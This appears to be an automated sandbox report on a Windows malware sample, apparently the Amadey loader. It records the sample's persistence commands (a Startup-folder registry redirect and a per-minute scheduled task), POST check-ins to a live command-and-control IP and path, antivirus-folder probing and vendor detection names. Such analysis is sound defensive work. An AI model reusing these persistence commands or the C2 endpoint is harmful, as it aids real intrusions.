Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 26, 2021, 9:22 a.m. | Oct. 26, 2021, 9:25 a.m. |
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
2548-
reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
2196
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
200
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
185.215.113.45 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.215.113.45:80 -> 192.168.56.103:49170 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
TCP 192.168.56.103:49170 -> 185.215.113.45:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.215.113.45/g4MbvE/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.215.113.45/g4MbvE/index.php?scr=1 |
request | POST http://185.215.113.45/g4MbvE/index.php |
request | POST http://185.215.113.45/g4MbvE/index.php?scr=1 |
request | POST http://185.215.113.45/g4MbvE/index.php |
request | POST http://185.215.113.45/g4MbvE/index.php?scr=1 |
file | C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\ |
file | C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe |
file | C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe |
cmdline | cmd /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\ |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\ |
cmdline | REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\ |
host | 185.215.113.45 |
file | C:\ProgramData\AVAST Software |
file | C:\ProgramData\Avira |
file | C:\ProgramData\Kaspersky Lab |
file | C:\ProgramData\Panda Security |
file | C:\ProgramData\Bitdefender |
file | C:\ProgramData\AVG |
file | C:\ProgramData\Doctor Web |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F |
Elastic | malicious (high confidence) |
FireEye | Generic.mg.f6be182d94ecfa61 |
McAfee | RDN/Generic.rp |
Cylance | Unsafe |
Sangfor | Suspicious.Win32.Save.a |
CrowdStrike | win/malicious_confidence_90% (W) |
BitDefenderTheta | Gen:NN.ZexaF.34236.yuW@aOfGKFci |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/GenKryptik.FMOK |
APEX | Malicious |
Kaspersky | UDS:DangerousObject.Multi.Generic |
NANO-Antivirus | Virus.Win32.Gen.ccmw |
Avast | FileRepMetagen [Malware] |
Rising | Trojan.Generic@ML.85 (RDML:qqNYuXiQ1ilL0QgB4fSmQw) |
McAfee-GW-Edition | BehavesLike.Win32.Trojan.fm |
Sophos | Mal/Generic-R + Mal/EncPk-APW |
Ikarus | Trojan.Win32.Crypt |
eGambit | Unsafe.AI_Score_89% |
Microsoft | Trojan:Win32/Sabsik.FL.A!ml |
Gridinsoft | Malware.Win32.Gen.bot!se28925 |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
Cynet | Malicious (score: 100) |
SentinelOne | Static AI - Malicious PE |
AVG | FileRepMetagen [Malware] |
Cybereason | malicious.88e923 |